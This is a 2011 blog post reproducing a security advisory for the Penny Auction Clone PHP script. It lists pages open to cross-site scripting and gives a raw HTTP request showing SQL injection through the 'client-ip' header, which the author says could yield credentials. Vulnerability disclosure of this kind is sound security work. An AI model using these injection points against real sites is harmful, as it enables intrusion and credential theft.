Thursday, March 17, 2011

Peny Auction Clone (Swoopo Clone) SQL Injection and Cross Site Scripting Vulneribilities.

I am really dump in work. Working for life and put my favorites aside. Really sad :(


#-------------------------------------------------------------------------------------------------------------------
# Peny Auction Clone (Swoopo Clone) SQL Injection and Cross Site Scripting Vulneribilities.
# Author : Sangteamtham
# Home : Hcegroup.net
# Download :http://www.pennyauctionsoft.com/
# Date :03/20/2011
# Twitter:@Sangte_amtham
#
#******************************************************************************************
#1.Description:
#Pennyauctionsoft is a brand new powerful, effective and feature-rich Swoopo script Clone application
# that is ready to use out of the box.
#2.Vulnerabilities:
# I reported this to the authors. After interesting conversation, everything is still the same until now.
# Almost the the files get XSS vuls. I don't think that i will list all, but some of them.
#2.a XSS vulnerabilities:
# Some of XSS:
# http://server/index.php/"XSS
# http://server/jobs.php/"XSS
# http://server/contact.php/"XSS
# http://server/forum/index.php/"
 # http://server/forum/index.php/",



# Many of them are still get vulnerabilities.
#
#2.b: MySQL injection.
# It seems the request to server is not filtered well with client-ip using GET method.
#
#
# http://server/allauctions.php
#
# Host: www.server.com
# User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
# client-ip: 127.0.0.1 '
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
# Accept-Language: en-us,en;q=0.5
# Accept-Encoding: gzip,deflate
# Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
# Keep-Alive: 115
# Connection: keep-alive
# Cookie: PHPSESSID=dc3fa290bcf7f865d6c43bb19e607a74
#
# As demo, Attacker will get the vulnerability and try to inject and get credential information.
# Still vulnerability with :
# http://server/allauctions.php
# http://server/registration.php
# http://server/forum/forum_detail.php
#
#
#
#******************************************************************************************
# Greetz to: All Vietnamese hackers and Hackers out there researching for more security
#--------------------------------------------------------------------------------------------------------------------

 Refer:
http://www.securityfocus.com/bid/46920/
http://securityreason.com/exploitalert/10171
http://secunia.com/advisories/43801

1 comment: